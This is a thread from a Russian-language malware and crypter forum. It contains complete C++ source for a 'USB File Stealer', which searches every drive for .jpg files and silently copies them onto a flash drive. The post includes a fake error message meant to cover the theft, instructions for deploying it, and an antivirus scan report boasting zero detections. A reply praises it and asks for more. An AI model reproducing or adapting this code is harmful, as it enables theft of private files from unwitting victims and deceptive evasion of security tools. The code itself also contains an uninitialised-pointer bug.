FuckAV - Форум о крипторах

Анонимный антивирусный сканер VPN-сервис
[Copi]Team DDoS Service

SEO статьи - блог от создателя FuckAV | KOROVKA.so | Качественный VPN Service MultiVPN - PPTP/OpenVPN/DoubleVPN

Реклама на форуме | Помощь форуму | Аварийный блог

Наш Jabber-сервер расположен по адресу fuckav.in. Добро пожаловать!!!

Вернуться  

Для того, чтобы ответить в теме, необходимо зарегистрироваться.
 
Опции темы Опции просмотра
Старый 25-01-2014   #1
IBM

xor esp, esp
 
Аватар для IBM

Последняя активность:
1 день назад
Регистрация: 30.11.2013
Сообщений: 76
Поблагодарили всего: 160
за это сообщение: 5
По умолчанию [C++] USB File Stealer

Всем привет, наткнулся на такую тему: /showthread.php?p=93826#post93826

Ошалел немного от детекта, если честно. Откуда руки должны расти, что бы она вообще палилась?

Код:

Код:
#include <windows.h>
#include "shlobj.h"
#include "stdio.h"

typedef void (*LPSEARCHFUNC)(LPCTSTR lpszFileName);
int count = 0;
char scount[6], target[MAX_PATH];

void Manip(LPCTSTR lpszFileName)
{
    count++;
    strcpy(target, "Collection\\");
    itoa(count, scount, 10);
    strcat(target, scount);
    strcat(target, ".jpg");
    CopyFile(lpszFileName, target, true); 
}

BOOL SearchFiles(LPCTSTR lpszFileName, LPSEARCHFUNC lpSearchFunc, BOOL bInnerFolders = TRUE)
{
    LPTSTR part;
    char tmp[MAX_PATH]; 
    char name[MAX_PATH];

    HANDLE hSearch = NULL;
    WIN32_FIND_DATA wfd;
    memset(&wfd, 0, sizeof(WIN32_FIND_DATA));

    
    if(bInnerFolders)
    {
        if(GetFullPathName(lpszFileName, MAX_PATH, tmp, &part) == 0) return FALSE;
        strcpy(name, part);
        strcpy(part, "*.*");

        
        wfd.dwFileAttributes = FILE_ATTRIBUTE_DIRECTORY;
        if (!((hSearch = FindFirstFile(tmp, &wfd)) == INVALID_HANDLE_VALUE))
        do
        {
            if (!strncmp(wfd.cFileName, ".", 1) || !strncmp(wfd.cFileName, "..", 2))            
            continue;
        
            if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
            {
                char next[MAX_PATH];
                if(GetFullPathName(lpszFileName, MAX_PATH, next, &part) == 0) return FALSE;
                strcpy(part, wfd.cFileName);
                strcat(next, "\\");
                strcat(next, name);

                SearchFiles(next, lpSearchFunc, TRUE);
            }
        }
        while (FindNextFile(hSearch, &wfd));

        FindClose (hSearch); 
    }

    if ((hSearch = FindFirstFile(lpszFileName, &wfd)) == INVALID_HANDLE_VALUE) 
        return TRUE;
    do
    if (!(wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) 
    {
        char file[MAX_PATH];
        if(GetFullPathName(lpszFileName, MAX_PATH, file, &part) == 0) return FALSE;
        strcpy(part, wfd.cFileName);

        lpSearchFunc(file);
    }
    while (FindNextFile(hSearch, &wfd));
    FindClose (hSearch); 

    return TRUE;
}



int main()
  {
  char buf[26];
  const char *extension = "*.jpg";
  char *sname;
  GetLogicalDriveStringsA(sizeof(buf), buf);
  for (char *s = buf; *s; s+=strlen(s)+1) 
    {
      strcpy(sname, s);
      strcat(sname, extension);    
      SearchFiles(sname, Manip, TRUE); 
    }
  MessageBox(0, "I/O Exception Error. Code: 0x0001", "Fatal Error", MB_ICONERROR);
  }
Тырит *.jpg файлы и кладет их в папку Collection, которая находится в папке запуска. Не забудьте создать ее на флешке и кинуть в папку где она находится/в корень где она находится файл стиллера.

При окончании выбивает ошибку с текстом "I/O Exception Error. Code: 0x0001".

Максимальное количество файлов, которых она может стырить 999999, кому мало меняйте значение 6 в scount[6] на какое нибудь другое.


Название файла: main.exe
Размер файла: 20889 байт
Дата сканирования: Sat, 25 Jan 14 11:33:35 -0500
MD5-хэш файла: 5deb87ca1b540d5c69a4bca20d84adb5

Результат: 0 из 36

Ad-Aware: OK
AhnLab V3 Internet Security: OK
ArcaVir: OK
Avast: OK
AVG: OK
Avira: OK
Bitdefender/BullGuard: OK
BullGuard Internet Security 2013: OK
Comodo: OK
Dr.Web: OK
Emsisoft Anti-Malware (a-squared Anti-Malware): OK
eScan Internet Security Suite 14: OK
Fortinet 5: OK
F-Prot: OK
F-Secure 2014: OK
G Data: OK
IKARUS: OK
Immunet/ClamAV: OK
K7 Ultimate: OK
Kaspersky Internet Security 2014: OK
McAfee Total Protection 2013: OK
Microsoft Security Essentials: OK
NANO: OK
NOD32: OK
Norman: OK
Norton Internet Security: OK
Outpost Security Suite Pro 8.0: OK
Quick Heal: OK
Sophos: OK
SUPERAntiSpyware: OK
Total Defense Internet Security: OK
Trendmicro Titanium Internet Security: OK
Twister Antivirus 8: OK
VBA: OK
VIPRE Internet Security 2013: OK
Virit: OK

Scan report generated by Scanner.FuckAV.ru
IBM вне форума  
Сказали спасибо:
sifenks (13-02-2014), Vasilisk98 (11-02-2014), veterok (28-01-2014), POCT (26-01-2014), SysWOW64 (25-01-2014)
Старый 25-01-2014   #2
SysWOW64

Модератор
 
Аватар для SysWOW64

Последняя активность:
15 час(ов) назад
Регистрация: 15.07.2013
Сообщений: 341
Поблагодарили всего: 668
за это сообщение: 0
По умолчанию Re: [C++] USB File Stealer

Красава ! Выкладывай ещё если есть.Мне, как и другим новичкам в си понравились бы
сурсы с объяснением кода.Ну тут ясен хуй и так всё понятней некуда.Ещё раз спс за сурс !
Лично для себя решил учить C++/ASM.

Последний раз редактировалось SysWOW64; 25-01-2014 в 19:20.
SysWOW64 вне форума  
Для того, чтобы ответить в теме, необходимо зарегистрироваться.

Метки
char, file, hsearch, internet, stealer


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы
Опции просмотра
Комбинированный вид Комбинированный вид

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Delphi] File Sender nevazhno Pascal/Delphi 12 20-10-2012 18:44
Hosts File Checker v1.4 HaCk3D Софт 2 21-12-2011 20:49
Hosts File Checker HaCk3D Софт 2 07-12-2011 22:53
Mod Small File Binder KpuMuHaJl Джойнеры 8 25-10-2011 03:37

Часовой пояс GMT +3, время: 04:34.



Powered by vBulletin® Copyright ©2000 - 2014, Jelsoft Enterprises Ltd. Перевод: zCarot
Други: SEO блог Deymos'a| ProLogic.Su| DServers.ru| Форум веб-мастеров